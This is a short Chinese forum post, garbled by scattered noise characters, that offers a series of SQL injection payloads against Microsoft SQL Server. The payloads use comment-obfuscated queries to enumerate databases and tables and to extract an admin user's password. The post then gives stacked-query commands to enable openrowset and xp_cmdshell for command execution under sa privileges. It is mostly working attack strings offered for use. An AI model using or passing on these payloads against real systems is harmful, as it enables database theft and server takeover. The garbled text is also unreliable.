" u3 l' Y6 V( h# `9 x9 u' E8 B
9 ~* y) T( T/ K: L7 @2 w$ P
! y a, {4 q5 I$ J/ j[Copy to clipboard]CODE:
* x2 A' t- c4 }! j/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--7 Q6 q( j$ d/ R' b+ ^2 M9 r
s0 O" w) \; W# Z2 O) w4 K
爆表语句,somedb部份是所要列的数据库,红色数字1累加
5 r5 I* W+ c$ c, h
~2 z: f Y4 `* p- z8 J6 w2 }9 s7 q: J' m) U1 h
[Copy to clipboard]CODE:. B% _+ g! l: l5 j
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
. x% m+ K, y, Y1 P# F* \# U+ I% X2 o9 R; D# D) h. K; x
爆字段语句,爆表admin里user='icerover'的密码段5 X) k: Q6 d6 e5 V
0 ^/ i* |- s& Y2 C+ y
8 S0 r4 L0 x, Q! t
[Copy to clipboard]CODE:
4 W- N2 {0 z( Z**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--8 y8 n( u# M8 R& u4 u* O
! t4 I3 S8 T0 E2 i: k: B7 E$ L
mssql2005默认没有开xp_cmdshell的,openrowset也不能用0 d+ E6 k. t* p1 R1 P7 G( O+ t' w8 E
如果是sa权限,可以这样来开启
6 `9 A0 Q& A% G开启openrowset
" h0 |* \+ L2 T0 \9 X" }( a5 u+ o/ P
: C7 B% Z% n) A5 D% R+ t, n[Copy to clipboard]CODE:8 D# {0 s D& ]0 x6 O1 T! }
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
5 E! W. X& u0 m# J2 B/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--6 f) q1 T9 ]) { \# Q
S' ~2 ?, g! k L, p开启xp_cmdshell
5 s% o4 {, [' J5 z8 e6 g1 d: t7 S
0 q% K7 F* \/ @( F- q) w, i; F
, ~" d% A3 p0 F0 K- ^$ o[Copy to clipboard]CODE:
" C5 L. {3 d5 K3 p4 m" l6 I( TEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--5 @9 d) J/ H; ?. z* a f
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
& M0 _, n$ v- C1 n
6 o9 D* y8 _( ]$ }! g: Lok,over~~晚安
: G. o- H8 j0 m |